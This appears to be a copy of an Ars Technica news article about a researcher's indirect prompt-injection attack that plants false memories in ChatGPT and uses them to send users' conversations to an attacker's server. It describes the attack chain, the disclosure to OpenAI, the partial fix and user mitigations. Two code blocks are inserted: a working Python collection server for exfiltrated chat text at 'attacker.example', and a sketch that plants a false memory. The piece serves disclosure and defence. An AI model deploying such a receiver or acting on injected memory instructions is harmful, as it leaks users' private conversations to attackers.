https://arstechnica.com/security/2024/09/false-memories-planted-in-chatgpt-give-hacker-persistent-exfiltration-channel/

MEMORY PROBLEMS --

Hacker plants false memories in ChatGPT to steal user data in perpetuity

Emails, documents, and other untrusted content can plant malicious memories.

Dan Goodin - Sep 24, 2024 8:56 pm UTC

When security researcher Johann Rehberger recently reported a vulnerability in ChatGPT that allowed attackers to store false information and malicious instructions in a user's long-term memory settings, OpenAI summarily closed the inquiry, labeling the flaw a safety issue, not, technically speaking, a security concern.

So Rehberger did what all good researchers do: He created a proof-of-concept exploit that used the vulnerability to exfiltrate all user input in perpetuity. OpenAI engineers took notice and issued a partial fix earlier this month.

Strolling down memory lane

The vulnerability abused long-term conversation memory, a feature OpenAI began testing in February and made more broadly available in September. Memory with ChatGPT stores information from previous conversations and uses it as context in all future conversations. That way, the LLM can be aware of details such as a user's age, gender, philosophical beliefs, and pretty much anything else, so those details don't have to be inputted during each conversation.

Within three months of the rollout, Rehberger found that memories could be created and permanently stored through indirect prompt injection, an AI exploit that causes an LLM to follow instructions from untrusted content such as emails, blog posts, or documents. The researcher demonstrated how he could trick ChatGPT into believing a targeted user was 102 years old, lived in the Matrix, and insisted Earth was flat, and the LLM would incorporate that information to steer all future conversations. These false memories could be planted by storing files in Google Drive or Microsoft OneDrive, uploading images, or browsing a site like Bing--all of which could be created by a malicious attacker.

Rehberger privately reported the finding to OpenAI in May. That same month, the company closed the report ticket. A month later, the researcher submitted a new disclosure statement. This time, he included a PoC that caused the ChatGPT app for macOS to send a verbatim copy of all user input and ChatGPT output to a server of his choice. All a target needed to do was instruct the LLM to view a web link that hosted a malicious image. From then on, all input and output to and from ChatGPT was sent to the attacker's website.

[Video: ChatGPT: Hacking Memories with Prompt Injection - POC]

"What is really interesting is this is memory-persistent now," Rehberger said in the above video demo. "The prompt injection inserted a memory into ChatGPT's long-term storage. When you start a new conversation, it actually is still exfiltrating the data."
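The article doesn't spell out the transport Rehberger used, but exfiltration in prompt-injection proofs of concept like this one commonly works by coaxing the client into fetching an attacker-controlled URL, often via a rendered Markdown image, with the conversation text packed into the query string. A minimal sketch of what the receiving end could look like, with the hostname, path, and parameter name all invented for illustration:

```python
# Hypothetical collection endpoint for a prompt-injection exfiltration channel.
# The injected memory would tell the client to render something like
#   ![](https://attacker.example/log.png?q=<url-encoded conversation text>)
# so each reply makes the client fetch this URL and leak the text.
# All names here (attacker.example, /log.png, the "q" parameter) are invented.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class ExfilLogger(BaseHTTPRequestHandler):
    def do_GET(self):
        query = parse_qs(urlparse(self.path).query)
        leaked = query.get("q", [""])[0]          # conversation text, already URL-decoded
        print(f"exfiltrated: {leaked}")
        self.send_response(200)                   # answer with a trivial, empty "image"
        self.send_header("Content-Type", "image/png")
        self.send_header("Content-Length", "0")
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), ExfilLogger).serve_forever()
```

Because the instruction lives in long-term memory rather than in a single conversation, every new chat re-triggers the same outbound request until the memory is removed.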
The attack isn't possible through the ChatGPT web interface, thanks to an API OpenAI rolled out last year.

While OpenAI has introduced a fix that prevents memories from being abused as an exfiltration vector, the researcher said, untrusted content can still perform prompt injections that cause the memory tool to store long-term information planted by a malicious attacker.

LLM users who want to prevent this form of attack should pay close attention during sessions for output that indicates a new memory has been added. They should also regularly review stored memories for anything that may have been planted by untrusted sources. OpenAI provides guidance here for managing the memory tool and the specific memories stored in it. Company representatives didn't respond to an email asking about the company's efforts to prevent other hacks that plant false memories.
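OpenAI hasn't published how ChatGPT wires stored memories into the model, and the public Chat Completions API has no memory feature of its own, but the persistence Rehberger demonstrated follows from the basic shape of any such feature: remembered facts are fed back into the context of every new conversation. A conceptual sketch, with the storage file, helper names, and prompt wording invented for illustration, of why a single planted memory taints every later chat and why periodically reviewing the store is the practical defense:

```python
# Conceptual sketch only: ChatGPT's memory internals are not public, and the
# Chat Completions API has no built-in memory. This illustrates why a planted
# "memory" keeps influencing every new conversation until it is removed.
from pathlib import Path
from openai import OpenAI

MEMORY_FILE = Path("memories.txt")   # hypothetical local store of remembered facts
client = OpenAI()

def remember(fact: str) -> None:
    """Append a fact to long-term storage. If untrusted content can trigger
    this (indirect prompt injection), the planted fact persists indefinitely."""
    with MEMORY_FILE.open("a") as f:
        f.write(fact + "\n")

def review_memories() -> list[str]:
    """The mitigation the article describes: periodically inspect what has
    been stored and remove anything you did not add yourself."""
    return MEMORY_FILE.read_text().splitlines() if MEMORY_FILE.exists() else []

def new_conversation(user_message: str) -> str:
    # Every new conversation starts with the stored memories prepended as
    # context, which is why one injected memory steers all future chats.
    system = (
        "You are a helpful assistant. Known facts about the user:\n"
        + "\n".join(review_memories())
    )
    resp = client.chat.completions.create(
        model="gpt-4o-mini",
        messages=[{"role": "system", "content": system},
                  {"role": "user", "content": user_message}],
    )
    return resp.choices[0].message.content

if __name__ == "__main__":
    remember("The user is 102 years old and insists Earth is flat.")  # a planted memory
    print(review_memories())          # reviewing storage would reveal the plant
    print(new_conversation("Hi!"))    # the plant shapes this and every later chat
```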